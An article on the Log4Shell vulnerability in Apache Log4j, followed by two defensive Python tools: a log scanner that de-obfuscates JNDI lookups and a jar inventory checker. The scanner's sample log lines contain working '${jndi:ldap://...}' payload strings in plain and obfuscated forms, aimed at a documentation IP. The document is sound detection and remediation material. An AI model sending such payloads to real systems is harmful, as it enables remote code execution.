Serious Log4j Security Flaw Puts The Entire Internet At Risk, Even iCloud And Steam

You may have heard about a recent prank making the rounds in Minecraft. By sending a chat message containing text that began with "${jndi:ldap://", users could make their friends' Minecraft client reach out to a server of the prankster's choosing and open a browser window on a specific website. So naturally, pranksters were sending their friends to all kinds of shocking and disgusting content, in what looked like a Minecraft-specific security flaw.

Unfortunately for everyone, it turns out that the prank was not exploiting a flaw in Minecraft at all, but one in the Apache Log4j library that Minecraft uses for logging (the bug is tracked as CVE-2021-44228 and has been nicknamed Log4Shell). The problem is that Minecraft is just one of thousands upon thousands of web-based and other applications that use Log4j. Once you start tracing where the library is used, it's actually easier to talk about what is not affected, rather than what is.

Valve's massive Steam game distribution service and Apple's iCloud are just two of the high-profile services reported to be affected, along with a huge share of the Java-based web services in the world. The flaw itself is not exotic; it is the injection pattern that shows up whenever a program interprets the data it handles as instructions. Log4j was deliberately built to treat certain "${...}" patterns in logged text as lookups to be evaluated, and nothing stopped text supplied by an attacker from carrying one. Java itself is not uniquely at fault here: the damage comes from pairing a logging library that evaluates expressions with a naming API (JNDI) that will fetch an object, and with it a class to load, from a server the attacker names.
What's actually happening in this case is that Log4j, while formatting a message for the log, expands lookup expressions of the form "${...}" found in the text, and one of those lookups, "${jndi:...}", asks Java's JNDI to fetch an object from a server named inside the string, typically over LDAP or RMI. If a server logs any attacker-controlled text anywhere (a username, a User-Agent header, a chat message) through a vulnerable Log4j, the attacker can point that lookup at their own server and have the application load and run a class it supplies. That is remote code execution with whatever privileges the logging process has, which is usually far more than it needs, and it can be triggered by anyone who can get a string into a log. We probably don't need to explain why that's a huge problem, but just in case: it hands an unauthenticated remote user code execution on every internet-facing system that logs its input with a vulnerable Log4j.
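The detection side of this, as an added example that is not code from the article or from the Log4j project: a small Python scanner that folds the nested-lookup tricks attackers used to hide the "${jndi:" prefix (${lower:...}, ${::-x}, ${env:NaN:-x} and the quoted-literal date form) and then flags whatever remains. The log lines it runs over are constructed for the example, and the lookup forms it folds are the ones seen in the wild; anything it cannot fold is reported for a human to look at rather than silently passed.

```python
import re
from typing import Optional

# Innermost ${...} lookup: a body with no further "$", "{" or "}" inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# What every obfuscated variant collapses to once its inner lookups are folded.
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def resolve_inner(body: str) -> Optional[str]:
    """Evaluate the lookup forms attackers use purely to hide the word "jndi".

    Returns the literal text the lookup yields, or None for anything else,
    which is left in place so a human can inspect it.
    """
    m = re.fullmatch(r"(lower|upper):(.*)", body, re.DOTALL)
    if m:                                    # ${lower:J} -> "j", ${upper:j} -> "J"
        return m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper()
    m = re.fullmatch(r"date:'([^']*)'", body)
    if m:                                    # ${date:'j'} -> "j" (quoted literal in the date pattern)
        return m.group(1)
    m = re.fullmatch(r"[^:]*:[^:]*:-(.*)", body, re.DOTALL)
    if m:                                    # ${::-j}, ${env:NaN:-j}, ${sys:none:-j} -> "j"
        return m.group(1)
    return None


def normalize(text: str, max_rounds: int = 16) -> str:
    """Fold innermost obfuscation lookups, repeating until nothing more resolves."""
    for _ in range(max_rounds):
        changed = False

        def fold(m):
            nonlocal changed
            body = m.group(1)
            if body.lower().startswith("jndi:"):
                return m.group(0)            # keep the payload itself intact for reporting
            value = resolve_inner(body)
            if value is None:
                return m.group(0)
            changed = True
            return value

        text = INNER.sub(fold, text)
        if not changed:
            break
    return text


def classify(line: str) -> dict:
    norm = normalize(line)
    if JNDI.search(norm):
        verdict = "jndi"        # Log4Shell payload, plain or de-obfuscated
    elif "${" in norm:
        verdict = "review"      # a lookup this folder does not understand; inspect by hand
    else:
        verdict = "clean"
    return {"verdict": verdict, "normalized": norm, "raw": line}


def scan(lines) -> list:
    return [classify(line) for line in lines]


# Constructed sample access-log lines; 198.51.100.0/24 is a documentation range, not a real attacker.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.7/a}"',
    'template rendered: ${unit_price} USD',
    'jndi lookups disabled in log4j configuration',
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOGS):
        print(f"{r['verdict']:7} {r['normalized']}")
```

The point of the "review" verdict is that a plain grep for "jndi" misses every obfuscated form, while a grep for "${" drowns in template noise; folding first and then matching gives a short list of real hits plus a smaller list of oddities worth a look.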

The bug is already patched in Log4j version 2.15.0 (follow-up fixes shipped soon after in 2.16.0 and 2.17.x, so the current 2.x release is the real target), but the logging package is included in an incredible number of applications, even ones you wouldn't expect. The application doesn't have to be written in Java itself to use Log4j: Kotlin, Scala, Groovy and Clojure code all run on the JVM and routinely pull it in, and it ships embedded inside plenty of packaged products. Third-party application developers may be slow to patch their software, and in some cases may not even be aware that they are including Log4j as a dependency. If you have a system that isn't or can't be patched, there are workarounds, which the Apache group details on its Log4j security vulnerabilities page. The one that works on every 2.x version is deleting the JndiLookup class from the log4j-core jar; the log4j2.formatMsgNoLookups=true property (or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable) only exists from 2.10 onward and was later judged insufficient on its own, so prefer removing the class if you can't upgrade.
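For the "may not even be aware they are including Log4j" problem, here is an added example (mine, not Apache's) of an inventory check in Python: it walks a directory, opens every archive it finds (including jars nested inside fat jars and WAR bundles), reads the version from log4j-core's Maven pom.properties and checks whether JndiLookup.class is still present, which is exactly what the removal workaround changes. The install tree it scans is built from constructed, fake jars that carry only the entry names that matter. The version it treats as fully fixed is 2.17.1 rather than the 2.15.0 the article names, because the follow-up releases closed further issues; that threshold is a constant you can adjust.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Optional

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear", ".zip")
# 2.15.0 closed the original hole; 2.16.0 and 2.17.x closed follow-up issues,
# so anything older than 2.17.1 is still reported as needing an upgrade.
FIXED_IN = (2, 17, 1)
ORIGINAL_FIX = (2, 15, 0)


def parse_version(v: str) -> tuple:
    # "2.14.1" -> (2, 14, 1); "2.0-beta9" -> (2, 0, 0); unparseable -> (0, 0, 0)
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else (0, 0, 0)


def log4j_core_version(zf: zipfile.ZipFile) -> Optional[str]:
    """Version from the pom.properties inside log4j-core (absent in log4j 1.x and in shaded copies)."""
    if POM_PROPS not in zf.namelist():
        return None
    for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def status_for(version: Optional[str], has_jndi: bool) -> str:
    if version is None:
        return "unknown-version"   # JndiLookup.class present but no pom.properties: shaded copy, inspect by hand
    v = parse_version(version)
    if v >= FIXED_IN:
        return "patched"
    if not has_jndi:
        return "mitigated"         # JndiLookup.class deleted from the jar, as in the Apache workaround
    if v >= ORIGINAL_FIX:
        return "upgrade"           # original flaw closed, follow-up fixes missing
    return "vulnerable"


def assess_archive(zf: zipfile.ZipFile, label: str) -> list:
    """Report every log4j-core in this archive, recursing into nested jars (fat jars, WARs)."""
    findings = []
    names = set(zf.namelist())
    version = log4j_core_version(zf)
    has_jndi = JNDI_CLASS in names
    if version is not None or has_jndi:
        findings.append({"path": label, "version": version,
                         "jndi_lookup_present": has_jndi, "status": status_for(version, has_jndi)})
    for name in sorted(names):
        if name.endswith(ARCHIVES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    findings.extend(assess_archive(inner, f"{label}!{name}"))
            except zipfile.BadZipFile:
                pass
    return findings


def scan_tree(root) -> list:
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix in ARCHIVES:
            try:
                with zipfile.ZipFile(p) as zf:
                    findings.extend(assess_archive(zf, p.relative_to(root).as_posix()))
            except zipfile.BadZipFile:
                pass
    return findings


# Constructed sample data: fake jars with the right entry names, not real Log4j builds.
def make_jar(version: Optional[str] = None, with_jndi: bool = True, nested: Optional[dict] = None) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if version:
            zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only; not a real class
        for name, data in (nested or {}).items():
            zf.writestr(name, data)
    return buf.getvalue()


def demo() -> dict:
    """Build a throwaway install tree, scan it, and return {path: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = Path(tmp) / "lib"
        lib.mkdir()
        (lib / "log4j-core-2.14.1.jar").write_bytes(make_jar("2.14.1"))
        (lib / "log4j-core-2.14.1-stripped.jar").write_bytes(make_jar("2.14.1", with_jndi=False))
        (lib / "log4j-core-2.17.1.jar").write_bytes(make_jar("2.17.1"))
        (lib / "commons-io-2.11.0.jar").write_bytes(make_jar(None, with_jndi=False))
        (lib / "shaded-logging.jar").write_bytes(make_jar(None, with_jndi=True))
        (Path(tmp) / "service.jar").write_bytes(
            make_jar(None, with_jndi=False, nested={"BOOT-INF/lib/log4j-core-2.13.3.jar": make_jar("2.13.3")}))
        return {f["path"]: f["status"] for f in scan_tree(tmp)}


if __name__ == "__main__":
    for path, status in demo().items():
        print(f"{status:16} {path}")
```

Point scan_tree at a real application directory instead of the demo tree to use it. The "unknown-version" bucket is deliberate: vendors often shade Log4j into their own jar under a relocated package, and a scanner that only trusts the Maven metadata will walk straight past those copies.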